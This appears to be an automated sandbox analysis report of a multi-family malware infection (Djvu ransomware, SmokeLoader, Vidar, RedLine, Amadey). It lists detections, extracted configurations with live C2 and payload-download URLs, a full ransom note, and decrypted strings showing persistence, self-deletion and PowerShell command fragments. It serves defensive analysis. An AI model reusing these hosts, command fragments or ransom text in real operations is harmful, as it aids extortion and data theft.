Source: C:\Users\user\AppData\Local\Temp\5DA4.exe	Avira: detection malicious, Label: TR/Dropper.Gen
Source: C:\Users\user\AppData\Local\4c7c13e1-925f-4ff0-826d-ce9637761605\build2.exe	Avira: detection malicious, Label: HEUR/AGEN.1312455
Source: C:\Users\user\AppData\Local\Temp\C5F5.exe	Avira: detection malicious, Label: TR/AD.Nekark.gdaph

Source: 00000007.00000002.2558333737.00000000023F0000.00000040.00001000.00020000.00000000.sdmp	Malware Configuration Extractor: Djvu {"Download URLs": ["http://colisumy.com/dl/build2.exe", "http://zexeq.com/files/1/build3.exe"], "C2 url": "http://zexeq.com/raud/get.php", "Ransom note file": "_readme.txt", "Ransom note": "ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xN3VuzQl0a\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@freshmail.top\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0805JOsie", "Ignore Files": ["ntuser.dat", "ntuser.dat.LOG1", "ntuser.dat.LOG2", "ntuser.pol", ".sys", ".ini", ".DLL", ".dll", ".blf", ".bat", ".lnk", ".regtrans-ms", "C:\\SystemID\\", "C:\\Users\\Default User\\", "C:\\Users\\Public\\", "C:\\Users\\All Users\\", "C:\\Users\\Default\\", "C:\\Documents and Settings\\", "C:\\ProgramData\\", "C:\\Recovery\\", "C:\\System Volume Information\\", "C:\\Users\\%username%\\AppData\\Roaming\\", "C:\\Users\\%username%\\AppData\\Local\\", "C:\\Windows\\", "C:\\PerfLogs\\", "C:\\ProgramData\\Microsoft\\", "C:\\ProgramData\\Package Cache\\", "C:\\Users\\Public\\", "C:\\$Recycle.Bin\\", "C:\\$WINDOWS.~BT\\", "C:\\dell\\", "C:\\Intel\\", "C:\\MSOCache\\", "C:\\Program Files\\", "C:\\Program Files (x86)\\", "C:\\Games\\", "C:\\Windows.old\\", "D:\\Users\\%username%\\AppData\\Roaming\\", "D:\\Users\\%username%\\AppData\\Local\\", "D:\\Windows\\", "D:\\PerfLogs\\", "D:\\ProgramData\\Desktop\\", "D:\\ProgramData\\Microsoft\\", "D:\\ProgramData\\Package Cache\\", "D:\\Users\\Public\\", "D:\\$Recycle.Bin\\", "D:\\$WINDOWS.~BT\\", "D:\\dell\\", "D:\\Intel\\", "D:\\MSOCache\\", "D:\\Program Files\\", "D:\\Program Files (x86)\\", "D:\\Games\\", "E:\\Users\\%username%\\AppData\\Roaming\\", "E:\\Users\\%username%\\AppData\\Local\\", "E:\\Windows\\", "E:\\PerfLogs\\", "E:\\ProgramData\\Desktop\\", "E:\\ProgramData\\Microsoft\\", "E:\\ProgramData\\Package Cache\\", "E:\\Users\\Public\\", "E:\\$Recycle.Bin\\", "E:\\$WINDOWS.~BT\\", "E:\\dell\\", "E:\\Intel\\", "E:\\MSOCache\\", "E:\\Program Files\\", "E:\\Program Files (x86)\\", "E:\\Games\\", "F:\\Users\\%username%\\AppData\\Roaming\\", "F:\\Users\\%username%\\AppData\\Local\\", "F:\\Windo
Source: 0000002C.00000002.2964943607.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Malware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199560322242", "https://t.me/cahalgo"], "Botnet": "d37c48c18c73cc0e155c7e1dfde06db9"}
Source: 00000000.00000002.2123468725.0000000000850000.00000004.00001000.00020000.00000000.sdmp	Malware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["http://kumbuyartyty.net/", "http://criogetikfenbut.org/", "http://stualialuyastrelia.net/", "http://onualituyrs.org/", "http://sumagulituyo.org/", "http://snukerukeutit.org/", "http://lightseinsteniki.org/", "http://tyiuiunuewqy.org/", "http://liuliuoumumy.org/", "http://tonimiuyaytre.org/"]}
Source: 00000011.00000002.2885619931.0000000007291000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: RedLine {"C2 url": "51.255.152.132:36011", "Bot Id": "LogsDiller Cloud (TG: @logsdillabot)", "Authorization Header": "3a050df92d0cf082b2cdaf87863616be"}
Source: 22.0.C5F5.exe.a20000.0.unpack	Malware Configuration Extractor: Amadey {"C2 url": "79.137.192.18/9bDc8sQ/index.php", "Version": "3.87"}

Source: colisumy.com	Virustotal: Detection: 20%	Perma Link
Source: lightseinsteniki.org	Virustotal: Detection: 18%	Perma Link
Source: onualituyrs.org	Virustotal: Detection: 23%	Perma Link
Source: zexeq.com	Virustotal: Detection: 21%	Perma Link
Source: stualialuyastrelia.net	Virustotal: Detection: 21%	Perma Link
Source: alayyadcare.com	Virustotal: Detection: 13%	Perma Link
Source: snukerukeutit.org	Virustotal: Detection: 17%	Perma Link
Source: liuliuoumumy.org	Virustotal: Detection: 17%	Perma Link
Source: sumagulituyo.org	Virustotal: Detection: 17%	Perma Link
Source: h171008.srv22.test-hf.su	Virustotal: Detection: 15%	Perma Link
Source: http://95.214.27.254/getfile/winlog.exe	Virustotal: Detection: 20%	Perma Link
Source: http://colisumy.com/dl/build2.exe$run	Virustotal: Detection: 17%	Perma Link
Source: http://tonimiuyaytre.org/	Virustotal: Detection: 18%	Perma Link
Source: http://tyiuiunuewqy.org/	Virustotal: Detection: 18%	Perma Link
Source: http://171.22.28.219/treelatestprores.exe	Virustotal: Detection: 11%	Perma Link
Source: http://79.137.192.18/9bDc8sQ/index.php	Virustotal: Detection: 21%	Perma Link

Source: C:\Users\user\AppData\Local\4c7c13e1-925f-4ff0-826d-ce9637761605\build2.exe	ReversingLabs: Detection: 81%
Source: C:\Users\user\AppData\Local\4c7c13e1-925f-4ff0-826d-ce9637761605\build3.exe	ReversingLabs: Detection: 86%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\build2[1].exe	ReversingLabs: Detection: 81%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\build3[1].exe	ReversingLabs: Detection: 86%
Source: C:\Users\user\AppData\Local\Temp\577f58beff\yiueea.exe	ReversingLabs: Detection: 95%
Source: C:\Users\user\AppData\Local\Temp\5DA4.exe	ReversingLabs: Detection: 26%
Source: C:\Users\user\AppData\Local\Temp\958B.exe	ReversingLabs: Detection: 54%
Source: C:\Users\user\AppData\Local\Temp\A079.exe	ReversingLabs: Detection: 82%
Source: C:\Users\user\AppData\Local\Temp\A9E0.dll	ReversingLabs: Detection: 22%
Source: C:\Users\user\AppData\Local\Temp\B184.exe	ReversingLabs: Detection: 18%
Source: C:\Users\user\AppData\Local\Temp\C5F5.exe	ReversingLabs: Detection: 95%
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\treelatest.exe	ReversingLabs: Detection: 31%
Source: C:\Users\user\AppData\Local\db969c07-d660-4dc6-a8ce-143387f76dfd\958B.exe	ReversingLabs: Detection: 54%
Source: C:\Users\user\AppData\Roaming\vusretg	ReversingLabs: Detection: 39%

Source: 22.0.C5F5.exe.a20000.0.unpack	String decryptor:
Source: 22.0.C5F5.exe.a20000.0.unpack	String decryptor:
Source: 22.0.C5F5.exe.a20000.0.unpack	String decryptor:
Source: 22.0.C5F5.exe.a20000.0.unpack	String decryptor: 79.137.192.18
Source: 22.0.C5F5.exe.a20000.0.unpack	String decryptor: /9bDc8sQ/index.php
Source: 22.0.C5F5.exe.a20000.0.unpack	String decryptor: 3.87
Source: 22.0.C5F5.exe.a20000.0.unpack	String decryptor: S-%lu-
Source: 22.0.C5F5.exe.a20000.0.unpack	String decryptor: %-lu
Source: 22.0.C5F5.exe.a20000.0.unpack	String decryptor: -%lu
Source: 22.0.C5F5.exe.a20000.0.unpack	String decryptor: 577f58beff
Source: 22.0.C5F5.exe.a20000.0.unpack	String decryptor: yiueea.exe
Source: 22.0.C5F5.exe.a20000.0.unpack	String decryptor: SCHTASKS
Source: 22.0.C5F5.exe.a20000.0.unpack	String decryptor: /Create /SC MINUTE /MO 1 /TN
Source: 22.0.C5F5.exe.a20000.0.unpack	String decryptor: /TR "
Source: 22.0.C5F5.exe.a20000.0.unpack	String decryptor: " /F
Source: 22.0.C5F5.exe.a20000.0.unpack	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
Source: 22.0.C5F5.exe.a20000.0.unpack	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
Source: 22.0.C5F5.exe.a20000.0.unpack	String decryptor: Startup
Source: 22.0.C5F5.exe.a20000.0.unpack	String decryptor: cmd /C RMDIR /s/q
Source: 22.0.C5F5.exe.a20000.0.unpack	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: 22.0.C5F5.exe.a20000.0.unpack	String decryptor: rundll32
Source: 22.0.C5F5.exe.a20000.0.unpack	String decryptor: /Delete /TN "
Source: 22.0.C5F5.exe.a20000.0.unpack	String decryptor: Programs
Source: 22.0.C5F5.exe.a20000.0.unpack	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
Source: 22.0.C5F5.exe.a20000.0.unpack	String decryptor: %USERPROFILE%
Source: 22.0.C5F5.exe.a20000.0.unpack	String decryptor: \App
Source: 22.0.C5F5.exe.a20000.0.unpack	String decryptor: POST
Source: 22.0.C5F5.exe.a20000.0.unpack	String decryptor: &vs=
Source: 22.0.C5F5.exe.a20000.0.unpack	String decryptor: &sd=
Source: 22.0.C5F5.exe.a20000.0.unpack	String decryptor: &os=
Source: 22.0.C5F5.exe.a20000.0.unpack	String decryptor: &bi=
Source: 22.0.C5F5.exe.a20000.0.unpack	String decryptor: &ar=
Source: 22.0.C5F5.exe.a20000.0.unpack	String decryptor: &pc=
Source: 22.0.C5F5.exe.a20000.0.unpack	String decryptor: &un=
Source: 22.0.C5F5.exe.a20000.0.unpack	String decryptor: &dm=
Source: 22.0.C5F5.exe.a20000.0.unpack	String decryptor: &av=
Source: 22.0.C5F5.exe.a20000.0.unpack	String decryptor: &lv=
Source: 22.0.C5F5.exe.a20000.0.unpack	String decryptor: &og=
Source: 22.0.C5F5.exe.a20000.0.unpack	String decryptor: cred.dll\|clip.dll\|
Source: 22.0.C5F5.exe.a20000.0.unpack	String decryptor: Main
Source: 22.0.C5F5.exe.a20000.0.unpack	String decryptor: http://
Source: 22.0.C5F5.exe.a20000.0.unpack	String decryptor: https://
Source: 22.0.C5F5.exe.a20000.0.unpack	String decryptor: Plugins/
Source: 22.0.C5F5.exe.a20000.0.unpack	String decryptor: &unit=
Source: 22.0.C5F5.exe.a20000.0.unpack	String decryptor: shell32.dll
Source: 22.0.C5F5.exe.a20000.0.unpack	String decryptor: kernel32.dll
Source: 22.0.C5F5.exe.a20000.0.unpack	String decryptor: GetNativeSystemInfo
Source: 22.0.C5F5.exe.a20000.0.unpack	String decryptor: ProgramData\
Source: 22.0.C5F5.exe.a20000.0.unpack	String decryptor: AVAST Software
Source: 22.0.C5F5.exe.a20000.0.unpack	String decryptor: Avira
Source: 22.0.C5F5.exe.a20000.0.unpack	String decryptor: Kaspersky Lab
Source: 22.0.C5F5.exe.a20000.0.unpack	String decryptor: ESET
Source: 22.0.C5F5.exe.a20000.0.unpack	String decryptor: Panda Security
Source: 22.0.C5F5.exe.a20000.0.unpack	String decryptor: Doctor Web
Source: 22.0.C5F5.exe.a20000.0.unpack	String decryptor: 360TotalSecurity
Source: 22.0.C5F5.exe.a20000.0.unpack	String decryptor: Bitdefender
Source: 22.0.C5F5.exe.a20000.0.unpack	String decryptor: Norton
Source: 22.0.C5F5.exe.a20000.0.unpack	String decryptor: Sophos
Source: 22.0.C5F5.exe.a20000.0.unpack	String decryptor: Comodo
Source: 22.0.C5F5.exe.a20000.0.unpack	String decryptor: WinDefender
Source: 22.0.C5F5.exe.a20000.0.unpack	String decryptor: 0123456789
Source: 22.0.C5F5.exe.a20000.0.unpack	String decryptor: Content-Type: multipart/form-data; boundary=----
Source: 22.0.C5F5.exe.a20000.0.unpack	String decryptor: ------
Source: 22.0.C5F5.exe.a20000.0.unpack	String decryptor: ?scr=1
Source: 22.0.C5F5.exe.a20000.0.unpack	String decryptor: .jpg
Source: 22.0.C5F5.exe.a20000.0.unpack	String decryptor: Content-Type: application/x-www-form-urlencoded
Source: 22.0.C5F5.exe.a20000.0.unpack	String decryptor: SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName
Source: 22.0.C5F5.exe.a20000.0.unpack	String decryptor: ComputerName
Source: 22.0.C5F5.exe.a20000.0.unpack	String decryptor: abcdefghijklmnopqrstuvwxyz0123456789-_
Source: 22.0.C5F5.exe.a20000.0.unpack	String decryptor: -unicode-
Source: 22.0.C5F5.exe.a20000.0.unpack	String decryptor: SYSTEM\CurrentControlSet\Control\UnitedVideo\CONTROL\VIDEO\
Source: 22.0.C5F5.exe.a20000.0.unpack	String decryptor: SYSTEM\ControlSet001\Services\BasicDisplay\Video
Source: 22.0.C5F5.exe.a20000.0.unpack	String decryptor: VideoID
Source: 22.0.C5F5.exe.a20000.0.unpack	String decryptor: \0000
Source: 22.0.C5F5.exe.a20000.0.unpack	String decryptor: DefaultSettings.XResolution
Source: 22.0.C5F5.exe.a20000.0.unpack	String decryptor: DefaultSettings.YResolution
Source: 22.0.C5F5.exe.a20000.0.unpack	String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: 22.0.C5F5.exe.a20000.0.unpack	String decryptor: ProductName
Source: 22.0.C5F5.exe.a20000.0.unpack	String decryptor: 2019
Source: 22.0.C5F5.exe.a20000.0.unpack	String decryptor: 2022
Source: 22.0.C5F5.exe.a20000.0.unpack	String decryptor: 2016
Source: 22.0.C5F5.exe.a20000.0.unpack	String decryptor: CurrentBuild
Source: 22.0.C5F5.exe.a20000.0.unpack	String decryptor: echo Y\|CACLS "
Source: 22.0.C5F5.exe.a20000.0.unpack	String decryptor: " /P "
Source: 22.0.C5F5.exe.a20000.0.unpack	String decryptor: CACLS "
Source: 22.0.C5F5.exe.a20000.0.unpack	String decryptor: :R" /E
Source: 22.0.C5F5.exe.a20000.0.unpack	String decryptor: :F" /E
Source: 22.0.C5F5.exe.a20000.0.unpack	String decryptor: &&Exit
Source: 22.0.C5F5.exe.a20000.0.unpack	String decryptor: rundll32.exe
Source: 22.0.C5F5.exe.a20000.0.unpack	String decryptor: "taskkill /f /im "
Source: 22.0.C5F5.exe.a20000.0.unpack	String decryptor: " && timeout 1 && del
Source: 22.0.C5F5.exe.a20000.0.unpack	String decryptor: && Exit"
Source: 22.0.C5F5.exe.a20000.0.unpack	String decryptor: " && ren
Source: 22.0.C5F5.exe.a20000.0.unpack	String decryptor: &&
Source: 22.0.C5F5.exe.a20000.0.unpack	String decryptor: Powershell.exe
Source: 22.0.C5F5.exe.a20000.0.unpack	String decryptor: -executionpolicy remotesigned -File "
Source: 22.0.C5F5.exe.a20000.0.unpack	String decryptor: Op
Source: 22.0.C5F5.exe.a20000.0.unpack	String decryptor: RP&
Source: 22.0.C5F5.exe.a20000.0.unpack	String decryptor: RL+
Source: 22.0.C5F5.exe.a20000.0.unpack	String decryptor: RZ%
Source: 22.0.C5F5.exe.a20000.0.unpack	String decryptor: RR0
Source: 22.0.C5F5.exe.a20000.0.unpack	String decryptor: RA/
Source: 22.0.C5F5.exe.a20000.0.unpack	String decryptor: RK8
Source: 22.0.C5F5.exe.a20000.0.unpack	String decryptor: RI8
Source: 22.0.C5F5.exe.a20000.0.unpack	String decryptor: ZG2J
Source: 22.0.C5F5.exe.a20000.0.unpack	String decryptor: pa
Source: 22.0.C5F5.exe.a20000.0.unpack	String decryptor: I5
Source: 22.0.C5F5.exe.a20000.0.unpack	String decryptor: I5
Source: 22.0.C5F5.exe.a20000.0.unpack	String decryptor: i9
Source: 22.0.C5F5.exe.a20000.0.unpack	String decryptor: ;
Source: 22.0.C5F5.exe.a20000.0.unpack	String decryptor: 8&:*
Source: 22.0.C5F5.exe.a20000.0.unpack	String decryptor: -enh
Source: 22.0.C5F5.exe.a20000.0.unpack	String decryptor: :\rt'1
Source: 22.0.C5F5.exe.a20000.0.unpack	String decryptor: _,
Source: 22.0.C5F5.exe.a20000.0.unpack	String decryptor: bJ
Source: 22.0.C5F5.exe.a20000.0.unpack	String decryptor:

Source: C:\Users\user\AppData\Local\Temp\2899.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\build3[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\build2[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\577f58beff\yiueea.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\4c7c13e1-925f-4ff0-826d-ce9637761605\build3.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\B184.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\5DA4.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\4c7c13e1-925f-4ff0-826d-ce9637761605\build2.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\C5F5.exe	Joe Sandbox ML: detected

Source: C:\Users\user\AppData\Local\Temp\958B.exe	Code function: 8_2_0040E870 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext,	8_2_0040E870
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Code function: 8_2_0040EA51 CryptDestroyHash,CryptReleaseContext,	8_2_0040EA51
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Code function: 8_2_0040EAA0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext,	8_2_0040EAA0
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Code function: 8_2_0040EC68 CryptDestroyHash,CryptReleaseContext,	8_2_0040EC68
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Code function: 8_2_00410FC0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,lstrlenA,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,CryptGetHashParam,_malloc,CryptGetHashParam,_memset,_sprintf,lstrcatA,CryptDestroyHash,CryptReleaseContext,	8_2_00410FC0
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Code function: 8_2_00411178 CryptDestroyHash,CryptReleaseContext,	8_2_00411178

Source: 2899.exe, 00000028.00000002.4508468054.000000000E4E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://eir5kdrltavou3c2wgqszfyte3jeg76hphm7fps7b7zhl4pokr5v6mqd.onion
Source: 2899.exe, 00000028.00000002.4508468054.000000000E4E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: 1 U0650271700133f52163721402002312055http://eir5kdrltavou3c2wgqszfyte3jeg76hphm7fps7b7zhl4pokr5v6mqd.onionhttp://eir5kdrltavou3c2wgqszfyte3jeg76hphm7fps7b7zhl4pokr5v6mqd.onionS-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\TestAppS-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7FirstInstallDateS-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7FirstInstallDateS-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7SELECT Name FROM Win32_ProcessorIntel(R) Core(TM)2 CPU 6600 @ 2.40 GHzS-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7current filenname with args "C:\Users\user\AppData\Local\Temp\2899.exe"
Source: 2899.exe, 00000028.00000002.4508468054.000000000E4E6000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://databaseupgrade.ruhttp://eir5kdrltavou3c2wgqszfyte3jeg76hphm7fps7b7zhl4pokr5v6mqd.onion
Source: 2899.exe, 00000028.00000002.4508468054.000000000E48E000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://eir5kdrltavou3c2wgqszfyte3jeg76hphm7fps7b7zhl4pokr5v6mqd.onion
Source: 2899.exe, 00000028.00000002.4508468054.000000000E48E000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: 04161610030607020106461710HKEY_USERS\S-1-5-21-2246122658-3693405117-2476756634-1003advapi32.dlla839a7d71a2dee1828e0f2b62022350439b4f41ccabc2a7c6affe16e329df454a839a7d71a2dee1828e0f2b62022350439b4f41ccabc2a7c6affe16e329df454advapi32.dllServiceVersionServiceVersionServersVersionServersVersionDistributorIDConnectServerOSArchitectureOSArchitecturenetapi32.dllConnectServerWindows DefenderConnectServeruser-PCWbemScripting.SWbemLocatorhttps://databaseupgrade.ruhttp://eir5kdrltavou3c2wgqszfyte3jeg76hphm7fps7b7zhl4pokr5v6mqd.onionhttps://databaseupgrade.ruhttp://eir5kdrltavou3c2wgqszfyte3jeg76hphm7fps7b7zhl4pokr5v6mqd.onionWbemScripting.SWbemLocatorWbemScripting.SWbemLocatorWbemScripting.SWbemLocator
Source: 2899.exe, 00000028.00000003.2776648258.0000000005A80000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: Nyiakeng_Puachue_HmongPakistan Standard TimeParaguay Standard TimeRoGetActivationFactoryRtlDeleteFunctionTableRtlGetNtVersionNumbersSafeArrayGetRecordInfoSafeArraySetRecordInfoSakhalin Standard TimeSao Tome Standard TimeSeImpersonatePrivilegeSetupDiEnumDriverInfoWSetupDiGetClassDevsExWTasmania Standard TimeTor bootstrap progressTor service is runningUnsupported Media TypeWSAGetOverlappedResultWSALookupServiceBeginWWaitForMultipleObjectsWget/1.12 (freebsd8.1)Xenu Link Sleuth/1.3.8access-control-max-ageaddress already in useadvapi32.dll not foundargument list too longassembly checks failedbad g->status in readybad sweepgen in refillbitcoin3nqy3db7c.onionbody closed by handlercannot allocate memoryclient not initializedcompileCallabck: type couldn't create devicecouldn't get file infocouldn't start servicecoulnd't write to filecreate main window: %wdecode and decrypt: %wdriver: bad connectionduplicated defer entryelectrum.leblancnet.uselectrum3.hodlister.coelectrum5.hodlister.coelectrumxhqdsmlu.onionencrypt and encode: %werror decoding messageerror parsing regexp: failed to get UUID: %wfailed to hide app: %wfailed to open key: %wfailed to open src: %wfailed to register: %wfailed to set UUID: %wframe_data_pad_too_bigfreeIndex is not validgenerate challenge: %wgetenv before env initgzip: invalid checksumheadTailIndex overflowheader field %q = %q%shpack: string too longhsmiths4fyqlw5xw.onionhsmiths5mjk6uijs.onionhttp2: frame too largehttp://localhost:3433/https://duniadekho.baridna: invalid label %qinappropriate fallbackinteger divide by zerointegrity check failedinterface conversion: internal inconsistencyinvalid Trailer key %qinvalid address familyinvalid number base %djson: unknown field %qkernel32.dll not foundmalformed HTTP versionminpc or maxpc invalidmissing ']' in addressmultiple :: in addressndndword5lpb7eex.onionnetwork is unreachableno connection providednon-Go function at pc=oldoverflow is not niloperation was canceledoverflowing coordinateozahtqwp25chjdjd.onionprotocol not availableprotocol not supportedqtornadoklbgdyww.onionread response body: %wreflect.Value.MapIndexreflect.Value.SetFloatreflectlite.Value.Elemreflectlite.Value.Typeremote address changedruntime.main not on m0runtime: work.nwait = runtime:scanstack: gp=s.freeindex > s.nelemss7clinmo4cazmhul.onionscanstack - bad statussecure boot is enabledsend on closed channelserver.peers.subscribeservice does not existservice is not runningset Tor mode to %s: %wskipping Question Nameskipping Question Typespan has no free spacesql: no Rows availablestack not a power of 2status/bootstrap-phasetrace reader (blocked)trace: alloc too largetransaction is stoppedtransaction not existsunexpected length codeunexpected method stepwirep: invalid p statewrite on closed bufferx509: malformed issuerzero length BIT STRINGzlib: invalid checksum into Go value of type ) must be a power of 2
Source: 2899.exe, 00000028.00000002.4499808504.0000000000400000.00000040.00000001.01000000.00000012.sdmp	String found in binary or memory: Nyiakeng_Puachue_HmongPakistan Standard TimeParaguay Standard TimeRoGetActivationFactoryRtlDeleteFunctionTableRtlGetNtVersionNumbersSafeArrayGetRecordInfoSafeArraySetRecordInfoSakhalin Standard TimeSao Tome Standard TimeSeImpersonatePrivilegeSetupDiEnumDriverInfoWSetupDiGetClassDevsExWTasmania Standard TimeTor bootstrap progressTor service is runningUnsupported Media TypeWSAGetOverlappedResultWSALookupServiceBeginWWaitForMultipleObjectsWget/1.12 (freebsd8.1)Xenu Link Sleuth/1.3.8access-control-max-ageaddress already in useadvapi32.dll not foundargument list too longassembly checks failedbad g->status in readybad sweepgen in refillbitcoin3nqy3db7c.onionbody closed by handlercannot allocate memoryclient not initializedcompileCallabck: type couldn't create devicecouldn't get file infocouldn't start servicecoulnd't write to filecreate main window: %wdecode and decrypt: %wdriver: bad connectionduplicated defer entryelectrum.leblancnet.uselectrum3.hodlister.coelectrum5.hodlister.coelectrumxhqdsmlu.onionencrypt and encode: %werror decoding messageerror parsing regexp: failed to get UUID: %wfailed to hide app: %wfailed to open key: %wfailed to open src: %wfailed to register: %wfailed to set UUID: %wframe_data_pad_too_bigfreeIndex is not validgenerate challenge: %wgetenv before env initgzip: invalid checksumheadTailIndex overflowheader field %q = %q%shpack: string too longhsmiths4fyqlw5xw.onionhsmiths5mjk6uijs.onionhttp2: frame too largehttp://localhost:3433/https://duniadekho.baridna: invalid label %qinappropriate fallbackinteger divide by zerointegrity check failedinterface conversion: internal inconsistencyinvalid Trailer key %qinvalid address familyinvalid number base %djson: unknown field %qkernel32.dll not foundmalformed HTTP versionminpc or maxpc invalidmissing ']' in addressmultiple :: in addressndndword5lpb7eex.onionnetwork is unreachableno connection providednon-Go function at pc=oldoverflow is not niloperation was canceledoverflowing coordinateozahtqwp25chjdjd.onionprotocol not availableprotocol not supportedqtornadoklbgdyww.onionread response body: %wreflect.Value.MapIndexreflect.Value.SetFloatreflectlite.Value.Elemreflectlite.Value.Typeremote address changedruntime.main not on m0runtime: work.nwait = runtime:scanstack: gp=s.freeindex > s.nelemss7clinmo4cazmhul.onionscanstack - bad statussecure boot is enabledsend on closed channelserver.peers.subscribeservice does not existservice is not runningset Tor mode to %s: %wskipping Question Nameskipping Question Typespan has no free spacesql: no Rows availablestack not a power of 2status/bootstrap-phasetrace reader (blocked)trace: alloc too largetransaction is stoppedtransaction not existsunexpected length codeunexpected method stepwirep: invalid p statewrite on closed bufferx509: malformed issuerzero length BIT STRINGzlib: invalid checksum into Go value of type ) must be a power of 2
